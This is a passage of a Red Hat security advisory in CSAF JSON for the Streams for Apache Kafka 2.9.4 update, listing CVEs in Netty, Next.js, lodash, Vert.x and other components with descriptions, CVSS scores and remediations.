| https://github.com/netty/netty/releases/tag/netty… | external |
| https://github.com/netty/netty/releases/tag/netty… | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-44573 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477199 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-44573 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-44573 | external |
| https://github.com/vercel/next.js/security/adviso… | external |
| https://access.redhat.com/security/cve/CVE-2026-44574 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477207 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-44574 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-44574 | external |
| https://github.com/vercel/next.js/security/adviso… | external |
| https://access.redhat.com/security/cve/CVE-2026-44575 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477188 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-44575 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-44575 | external |
| https://github.com/vercel/next.js/security/adviso… | external |
| https://access.redhat.com/security/cve/CVE-2026-44577 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477194 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-44577 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-44577 | external |
| https://github.com/vercel/next.js/security/adviso… | external |
| https://access.redhat.com/security/cve/CVE-2026-44578 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477187 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-44578 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-44578 | external |
| https://github.com/vercel/next.js/security/adviso… | external |
| https://access.redhat.com/security/cve/CVE-2026-44579 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477193 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-44579 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-44579 | external |
| https://github.com/vercel/next.js/security/adviso… | external |
| https://access.redhat.com/security/cve/CVE-2026-44893 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2488383 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-44893 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-44893 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-45109 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477190 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-45109 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-45109 | external |
| https://github.com/vercel/next.js/security/adviso… | external |
| https://access.redhat.com/security/cve/CVE-2026-45416 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2488391 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-45416 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-45416 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-45674 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2488400 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-45674 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-45674 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-47691 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2488439 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-47691 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-47691 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-48043 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2488442 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-48043 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-48043 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-48059 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2488437 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-48059 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-48059 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-50010 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2488429 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-50010 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-50010 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-50559 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2486959 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-50559 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-50559 | external |
| https://github.com/quarkusio/quarkus/security/adv… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Streams for Apache Kafka 2.9.4 is now available from the Red Hat Customer Portal.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Streams for Apache Kafka, based on the Apache Kafka project, offers a distributed\nbackbone that allows microservices and other applications to share data with\nextremely high throughput and extremely low latency.\n\nThis release of Red Hat Streams for Apache Kafka 2.9.4 serves as a replacement for Red Hat Streams for Apache Kafka 2.9.3, and includes security and bug fixes, and enhancements.\n\nSecurity Fix(es):\n\n * jose4j: Denial of Service via compressed JWE content (CVE-2024-29371)\n * cluster-operator: Cross-namespace privilege escalation via Kafka.spec.entityOperator.watchedNamespace in Strimzi (CVE-2026-55225)\n * netty-codec-http: Netty is vulnerable to request smuggling due to incorrect parsing of chunk extensions (CVE-2025-58056)\n * lodash: Arbitrary code execution via untrusted input in template imports (CVE-2026-4800)\n * React Server Components: Denial of Service via specially crafted HTTP requests (CVE-2026-23864)\n * Apache ZooKeeper: Impersonation of servers or clients via reverse DNS spoofing (CVE-2026-24281)\n * netty-codec-http: Request smuggling via incorrect parsing of HTTP/1.1 chunked transfer encoding extension values (CVE-2026-33870)\n * netty-codec-http2: Denial of Service via HTTP/2 CONTINUATION frame flood (CVE-2026-33871)\n * log4j-core: Invalid XML output causes denial of service in logging (CVE-2026-34480)\n * quarkus-vertx-http: Authorization bypass via semicolons in HTTP requests (CVE-2026-39852)\n * netty-codec: Denial of Service via excessive memory allocation in LZ4FrameDecoder (CVE-2026-42583)\n * netty-codec-http2: Denial of Service via unbounded memory allocation in HTTP content decompression (CVE-2026-42587)\n * netty-handler: IPv6 subnet rule bypass due to incorrect masking operation (CVE-2026-44249)\n * Next.js: Information disclosure due to middleware bypass in Pages Router with i18n (CVE-2026-44573)\n * Next.js: Authorization bypass via crafted query parameters (CVE-2026-44574)\n * Next.js: Unauthorized access to protected content via middleware bypass (CVE-2026-44575)\n * Next.js: Server-Side Request Forgery via crafted WebSocket upgrade requests (CVE-2026-44578)\n * Next.js: Denial of Service via crafted POST requests to server actions (CVE-2026-44579)\n * netty-codec-haproxy: Denial of Service via malformed HAProxy message (CVE-2026-44893)\n * Next.js: Information disclosure via security fix bypass in middleware with Turbopack (CVE-2026-45109)\n * netty-handler: Denial of Service via eager buffer allocation in TLS handshake (CVE-2026-45416)\n * netty-resolver-dns: Information disclosure and data manipulation due to improper CNAME record validation (CVE-2026-45674)\n * netty-resolver-dns: Insufficient Bailiwick Validation for NS Records (CVE-2026-47691)\n * netty-codec-http2: Denial of Service due to resource leak (CVE-2026-48043)\n * netty-codec-haproxy: Denial of Service via memory leak from crafted PROXY protocol headers (CVE-2026-48059)\n * netty-handler: Improper trust manager handling leads to hostname verification bypass (CVE-2026-50010)\n * quarkus-vertx-http: Authorization bypass in HTTP path-based policies via encoded characters (CVE-2026-50559)\n * lodash: Prototype pollution in _.unset and _.omit functions (CVE-2025-13465)\n * vertx-core: Static handler component cache can be manipulated to deny access to static files (CVE-2026-1002)\n * vertx-core: Denial of Service via TLS handshake with wildcard server name (CVE-2026-6860)\n * Apache ZooKeeper: Information disclosure via improper handling of configuration values (CVE-2026-24308)\n * Next.js: Unbounded next/image disk cache growth can exhaust storage (CVE-2026-27980)\n * DOMPurify: Cross-Site Scripting (XSS) via inconsistent tag sanitization (CVE-2026-41240)\n * axios: Invisible JSON Response Tampering via Prototype Pollution Gadget (CVE-2026-42044)\n * Next.js: Denial of Service via Image Optimization API (CVE-2026-44577)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:34608",
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2392996",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2392996"
},
{
"category": "external",
"summary": "2423194",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2423194"
},
{
"category": "external",
"summary": "2430180",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430180"
},
{
"category": "external",
"summary": "2431740",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431740"
},
{
"category": "external",
"summary": "2433059",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433059"
},
{
"category": "external",
"summary": "2445449",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445449"
},
{
"category": "external",
"summary": "2445451",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445451"
},
{
"category": "external",
"summary": "2448509",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448509"
},
{
"category": "external",
"summary": "2452453",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452453"
},
{
"category": "external",
"summary": "2452456",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452456"
},
{
"category": "external",
"summary": "2453496",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453496"
},
{
"category": "external",
"summary": "2457328",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457328"
},
{
"category": "external",
"summary": "2457819",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457819"
},
{
"category": "external",
"summary": "2461147",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461147"
},
{
"category": "external",
"summary": "2461624",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461624"
},
{
"category": "external",
"summary": "2466990",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2466990"
},
{
"category": "external",
"summary": "2477187",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477187"
},
{
"category": "external",
"summary": "2477188",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477188"
},
{
"category": "external",
"summary": "2477190",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477190"
},
{
"category": "external",
"summary": "2477193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477193"
},
{
"category": "external",
"summary": "2477194",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477194"
},
{
"category": "external",
"summary": "2477199",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477199"
},
{
"category": "external",
"summary": "2477207",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477207"
},
{
"category": "external",
"summary": "2477219",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477219"
},
{
"category": "external",
"summary": "2477220",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477220"
},
{
"category": "external",
"summary": "2486959",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2486959"
},
{
"category": "external",
"summary": "2488081",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488081"
},
{
"category": "external",
"summary": "2488383",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488383"
},
{
"category": "external",
"summary": "2488391",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488391"
},
{
"category": "external",
"summary": "2488400",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488400"
},
{
"category": "external",
"summary": "2488429",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488429"
},
{
"category": "external",
"summary": "2488437",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488437"
},
{
"category": "external",
"summary": "2488439",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488439"
},
{
"category": "external",
"summary": "2488442",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488442"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_34608.json"
}
],
"title": "Red Hat Security Advisory: Streams for Apache Kafka 2.9.4 release and security update",
"tracking": {
"current_release_date": "2026-07-05T14:33:47+00:00",
"generator": {
"date": "2026-07-05T14:33:47+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.1"
}
},
"id": "RHSA-2026:34608",
"initial_release_date": "2026-07-02T00:03:15+00:00",
"revision_history": [
{
"date": "2026-07-02T00:03:15+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-07-02T00:03:15+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-07-05T14:33:47+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Streams for Apache Kafka 2.9.4",
"product": {
"name": "Streams for Apache Kafka 2.9.4",
"product_id": "Streams for Apache Kafka 2.9.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:amq_streams:2.9::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Enterprise"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-29371",
"cwe": {
"id": "CWE-409",
"name": "Improper Handling of Highly Compressed Data (Data Amplification)"
},
"discovery_date": "2025-12-17T16:01:18.173727+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2423194"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in jose4j. A remote attacker can exploit this by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. When this token is processed by the server, it results in significant memory allocation and processing time during decompression. This can lead to a Denial of Service, making the service unavailable to legitimate users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jose4j: jose4j: Denial of Service via malicious JSON Web Encryption (JWE) token compression",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Important as it can lead to a Denial of Service in applications that process untrusted JSON Web Encryption tokens. An attacker can craft a malicious JWE token with an exceptionally high compression ratio, causing excessive memory allocation and processing time during decompression in affected components like jose4j. This affects products such as Red Hat AMQ, Enterprise Application Platform (EAP 8.0.z, 8.1.z), Red Hat JBoss Fuse, JBoss Data Grid, OpenShift Developer Tools \u0026 Services, Red Hat build of Apache Camel, Red Hat Integration, Red Hat OpenShift Dev Spaces, Red Hat Process Automation Manager, Red Hat Single Sign-On (RH-SSO), Insights, cloud.redhat.com, and OpenShift Serverless.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-29371"
},
{
"category": "external",
"summary": "RHBZ#2423194",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2423194"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-29371",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29371"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-29371",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29371"
},
{
"category": "external",
"summary": "https://bitbucket.org/b_c/jose4j/issues/220/vuln-zip-bomb-attack",
"url": "https://bitbucket.org/b_c/jose4j/issues/220/vuln-zip-bomb-attack"
}
],
"release_date": "2025-12-17T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jose4j: jose4j: Denial of Service via malicious JSON Web Encryption (JWE) token compression"
},
{
"cve": "CVE-2025-13465",
"cwe": {
"id": "CWE-1321",
"name": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)"
},
"discovery_date": "2026-01-21T20:01:28.774829+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431740"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "lodash: prototype pollution in _.unset and _.omit functions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue is only exploitable by applications using the _.unset and _.omit functions on an object and allowing user input to determine the path of the property to be removed. This issue only allows the deletion of properties but does not allow overwriting their behavior, limiting the impact to a denial of service. Due to this reason, this vulnerability has been rated with an important severity.\n\nIn Grafana, JavaScript code runs only in the browser, while the server side is all Golang. Therefore, the worst-case scenario is a loss of functionality in the client application inside the browser. To reflect this, the CVSS availability metric and the severity of the Grafana and the Grafana-PCP component have been updated to low and moderate, respectively.\n\nThe lodash dependency is bundled and used by the pcs-web-ui component of the PCS package. In Red Hat Enterprise Linux 8.10, the pcs-web-ui component is no longer included in the PCS package. As a result, RHEL 8.10 does not ship the vulnerable lodash component within PCS and is therefore not-affected by this CVE.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "RHBZ#2431740",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431740"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-13465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13465"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg",
"url": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg"
}
],
"release_date": "2026-01-21T19:05:28.846000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "To mitigate this issue, implement strict input validation before passing any property paths to the _.unset and _.omit functions to block attempts to access the prototype chain. Ensure that strings like __proto__, constructor and prototype are blocked, for example.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "lodash: prototype pollution in _.unset and _.omit functions"
},
{
"cve": "CVE-2025-58056",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2025-09-03T21:01:22.935850+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2392996"
}
],
"notes": [
{
"category": "description",
"text": "A flaw in Netty\u2019s HTTP/1.1 chunked encoding parser allows newline (LF) characters in chunk extensions to be incorrectly treated as the end of the chunk-size line instead of requiring the proper CRLF sequence. This discrepancy can be exploited in rare cases where a reverse proxy interprets the same input differently, potentially enabling HTTP request smuggling attacks such as bypassing access controls or corrupting responses.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty-codec-http: Netty is vulnerable to request smuggling due to incorrect parsing of chunk extensions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue is considered Moderate rather than Important because successful exploitation depends on a very specific deployment condition: the presence of an intermediary reverse proxy that both mishandles lone LF characters in chunk extensions and forwards them unmodified to Netty. By itself, Netty\u2019s parsing quirk does not introduce risk, and in most real-world environments, reverse proxies normalize or reject malformed chunked requests, preventing smuggling. As a result, the vulnerability has limited reach, requires a niche configuration to be exploitable, and does not universally expose Netty-based servers to request smuggling\u2014hence it is rated moderate in severity rather than important or critical.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-58056"
},
{
"category": "external",
"summary": "RHBZ#2392996",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2392996"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-58056",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58056"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-58056",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58056"
},
{
"category": "external",
"summary": "https://datatracker.ietf.org/doc/html/rfc9112#name-chunked-transfer-coding",
"url": "https://datatracker.ietf.org/doc/html/rfc9112#name-chunked-transfer-coding"
},
{
"category": "external",
"summary": "https://github.com/JLLeitschuh/unCVEed/issues/1",
"url": "https://github.com/JLLeitschuh/unCVEed/issues/1"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/commit/edb55fd8e0a3bcbd85881e423464f585183d1284",
"url": "https://github.com/netty/netty/commit/edb55fd8e0a3bcbd85881e423464f585183d1284"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/issues/15522",
"url": "https://github.com/netty/netty/issues/15522"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/pull/15611",
"url": "https://github.com/netty/netty/pull/15611"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-fghv-69vj-qj49",
"url": "https://github.com/netty/netty/security/advisories/GHSA-fghv-69vj-qj49"
},
{
"category": "external",
"summary": "https://w4ke.info/2025/06/18/funky-chunks.html",
"url": "https://w4ke.info/2025/06/18/funky-chunks.html"
}
],
"release_date": "2025-09-03T20:56:50.732000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "To mitigate this issue, enforce strict RFC compliance on all front-end proxies and load balancers so that lone LF characters in chunk extensions are rejected or normalized before being forwarded. Additionally, configure input validation at the application or proxy layer to block malformed chunked requests, ensuring consistent parsing across all components in the request path.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "netty-codec-http: Netty is vulnerable to request smuggling due to incorrect parsing of chunk extensions"
},
{
"cve": "CVE-2026-1002",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2026-01-15T21:03:20.088599+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2430180"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Vert.x. The Web static handler component cache can be manipulated to deny the access to static files served by the handler using specifically crafted request URIs, preventing legitimate users from accessing static files with an HTTP 404 response.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "io.vertx/vertx-core: static handler component cache can be manipulated to deny the access to static files",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability allows a remote attacker to block access to specific static files, such as images, CSS or HTML files. However, the underlying Vert.x server, the API endpoints and other non-cached resources are not affected. Due to this reason, this issue has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-1002"
},
{
"category": "external",
"summary": "RHBZ#2430180",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430180"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-1002",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1002"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1002",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1002"
},
{
"category": "external",
"summary": "https://github.com/eclipse-vertx/vert.x/pull/5895",
"url": "https://github.com/eclipse-vertx/vert.x/pull/5895"
}
],
"release_date": "2026-01-15T20:50:25.642000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, consider disabling the static handler cache by configuring the StaticHandler instance with setCachingEnabled(false), for example:\n\n~~~\nStaticHandler staticHandler = StaticHandler.create().setCachingEnabled(false);\n~~~",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "io.vertx/vertx-core: static handler component cache can be manipulated to deny the access to static files"
},
{
"cve": "CVE-2026-4800",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
